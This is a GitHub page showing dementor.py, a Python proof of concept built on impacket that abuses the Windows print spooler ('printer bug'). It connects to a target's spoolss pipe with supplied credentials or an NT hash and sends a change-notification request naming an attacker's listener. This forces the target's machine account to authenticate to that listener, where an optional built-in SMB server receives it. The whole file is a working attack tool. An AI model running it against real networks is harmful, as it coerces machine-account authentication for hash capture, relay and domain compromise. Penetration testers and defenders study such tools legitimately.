forked from NotMedic/NetNTLMtoSilverTicket
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdementor.py
206 lines (183 loc) · 8.5 KB
/
dementor.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
#!/usr/bin/env python
# originally by 3xocyte, modified by agsolino after native MS-RPRN functionality was added to impacket
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import configparser
import logging
from time import sleep
from threading import Thread
from impacket import smbserver, smb
from impacket.dcerpc.v5 import transport, rprn
from impacket.structure import Structure
from impacket.uuid import uuidtup_to_bin
from impacket.examples import logger
target = ''
listener = ''
debug = False
show_banner = """
**
** *
** **
** **
** ******** **** *** ****
*** ** *** *** **** **** *** *** **** ******** * *** * **** **** *
********* * *** *** **** *** * * *** **** **** * ** * **** ** ****
** **** * *** ** **** **** * *** ** **** ** ** ** **
** ** ** *** ** ** ** ** *** ** ** ** ** ** **
** ** ******** ** ** ** ******** ** ** ** ** ** **
** ** ******* ** ** ** ******* ** ** ** ** ** **
** ** ** ** ** ** ** ** ** ** ** ** **
** ** **** * ** ** ** **** * ** ** ** ****** ***
***** ******* *** *** *** ******* *** *** ** **** ***
*** ***** *** *** *** ***** *** ***
rough PoC to connect to spoolss to elicit machine account authentication
implementation by @3xocyte, idea/discovery by @tifkin_, rediscovery and
code fixes for Windows 10/2016 by @elad_shamir
"""
class SMBServer(Thread):
def __init__(self):
Thread.__init__(self)
self.smb = None
def run(self):
# mini config for the server
smbConfig = configparser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global', 'server_name','server_name')
smbConfig.set('global', 'server_os','Windows')
smbConfig.set('global', 'server_domain','WORKGROUP')
smbConfig.set('global', 'log_file','')
smbConfig.set('global', 'credentials_file','')
smbConfig.set("global", 'SMB2Support', 'True')
# fake ipc$
smbConfig.add_section('IPC$')
smbConfig.set('IPC$', 'comment', '')
smbConfig.set('IPC$', 'read only', 'yes')
smbConfig.set('IPC$', 'share type', '3')
smbConfig.set('IPC$', 'path')
self.smb = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
self.smb.processConfigFile()
# unregister dangerous commands
self.smb.unregisterSmbCommand(smb.SMB.SMB_COM_CREATE_DIRECTORY)
self.smb.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE_DIRECTORY)
self.smb.unregisterSmbCommand(smb.SMB.SMB_COM_RENAME)
self.smb.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE)
self.smb.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE)
self.smb.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE_ANDX)
try:
self.smb.serve_forever()
except:
pass
def stop(self):
self.smb.socket.close()
self.smb.server_close()
self._Thread__stop()
def call_open_printer(dce):
global debug
logging.info("getting context handle...")
try:
resp = rprn.hRpcOpenPrinter(dce, "\\\\%s\x00" % target)
if debug == True:
logging.debug("raw response: ")
resp.dump()
logging.debug("handle is: %s" % binascii.hexlify(resp['pHandle']))
except Exception as e:
logging.error("exception " + str(e))
dce.disconnect()
sys.exit()
return resp['pHandle']
def grab_hash(dce, handle, listener):
global debug
logging.info("sending RFFPCNEX...")
try:
resp = rprn.hRpcRemoteFindFirstPrinterChangeNotificationEx(dce, handle, rprn.PRINTER_CHANGE_ADD_JOB,
pszLocalMachine='\\\\%s\x00' % listener)
if debug is True:
logging.info("raw response: ")
resp.dump()
except Exception as e:
if str(e).find('RPC_S_SERVER_UNAVAILABLE') >= 0:
logging.info('Got expected RPC_S_SERVER_UNAVAILABLE exception. Attack worked')
pass
else:
logging.error("exception %s" % str(e))
def create_connection(domain, username, password, ntlm):
# set up connection prereqs
# creds
creds={}
creds['username'] = username
creds['password'] = password
creds['domain'] = domain
creds['nthash'] = ntlm
# to transport
stringBinding = r'ncacn_np:%s[\pipe\spoolss]' % target
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if hasattr(rpctransport, 'set_credentials'):
rpctransport.set_credentials(creds['username'], creds['password'], creds['domain'], nthash = creds['nthash'])
dce = rpctransport.get_dce_rpc()
# actually connect
logging.info("connecting to %s" % target)
try:
dce.connect()
except Exception as e:
if "STATUS_ACCESS_DENIED" in str(e):
logging.error("access denied")
sys.exit()
else:
logging.error("unhandled exception occured: %s" % str(e))
sys.exit()
# defines the printer endpoint
try:
dce.bind(rprn.MSRPC_UUID_RPRN)
except Exception as e:
logging.error("unhandled exception: %s" % str(e))
sys.exit()
logging.info("bound to spoolss")
return dce
def main():
# globals
global target
global listener
global debug
global show_banner
logger.init()
parser = argparse.ArgumentParser(add_help = True, description = "dementor - rough PoC to connect to spoolss to elicit machine account authentication (implementation by @3xocyte, idea/discovery by @tifkin_, rediscovery and code fixes by @elad_shamir)")
parser.add_argument('-u', '--username', action="store", default='', help='valid username')
parser.add_argument('-p', '--password', action="store", default='', help='valid password')
parser.add_argument('-d', '--domain', action="store", default='', help='valid domain name')
parser.add_argument('--ntlm', action="store", default='', help='nt hash')
parser.add_argument('--server', action='store_true', default=False, help='create smb listener')
parser.add_argument('--debug', action="store_true", default=False, help='enable debugging')
parser.add_argument('-q', '--banner', action="store_true", default=False,help='show banner')
parser.add_argument('listener', help='ip address or hostname of listener')
parser.add_argument('target', help='ip address or hostname of target')
options = parser.parse_args()
domain = options.domain
username = options.username
password = options.password
ntlm = options.ntlm
server = options.server
listener = options.listener
target = options.target
debug = options.debug
banner = options.banner
if banner is True:
print(show_banner)
if server is True:
logging.info("starting smb server...")
server_thread = SMBServer()
server_thread.daemon = True
server_thread.start()
sleep(1) # ensure server starts before continuing
logging.info("server running")
dce = create_connection(domain, username, password, ntlm)
handle = call_open_printer(dce)
grab_hash(dce, handle, listener)
logging.info("done!")
dce.disconnect()
sys.exit()
if __name__ == '__main__':
main()